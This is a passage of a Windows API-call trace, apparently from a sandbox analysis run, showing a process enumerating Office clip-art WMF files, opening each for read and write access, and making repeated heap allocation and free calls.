Flags=0x0, Size=0x8a) returned 0x8b110 [0102.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 69 [0102.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.822] GetFileType (hFile=0x33c) returned 0x1 [0102.822] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.822] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.824] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.825] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.825] CloseHandle (hObject=0x33c) returned 1 [0102.825] AreFileApisANSI () returned 1 [0102.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 69 [0102.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.826] GetFileType (hFile=0x33c) returned 0x1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.826] CloseHandle (hObject=0x33c) returned 1 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.826] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.826] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.827] AreFileApisANSI () returned 1 [0102.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.827] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 69 [0102.827] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec4)) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.827] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0102.827] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1044, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00274_.WMF", cAlternateFileName="")) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.828] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.828] AreFileApisANSI () returned 1 [0102.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.828] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.829] AreFileApisANSI () returned 1 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.829] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 69 [0102.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.829] GetFileType (hFile=0x33c) returned 0x1 [0102.829] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0102.829] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.829] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.830] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.830] CloseHandle (hObject=0x33c) returned 1 [0102.830] AreFileApisANSI () returned 1 [0102.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 69 [0102.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.830] GetFileType (hFile=0x33c) returned 0x1 [0102.830] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.830] CloseHandle (hObject=0x33c) returned 1 [0102.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.830] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.831] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.831] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.832] AreFileApisANSI () returned 1 [0102.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8afe0 [0102.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8afe0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF") returned 69 [0102.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00274_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00274_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1044)) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0102.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.832] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.832] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd5c704c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd5c704c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6396e0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00296_.WMF", cAlternateFileName="")) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.832] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.832] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0102.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.833] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.833] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 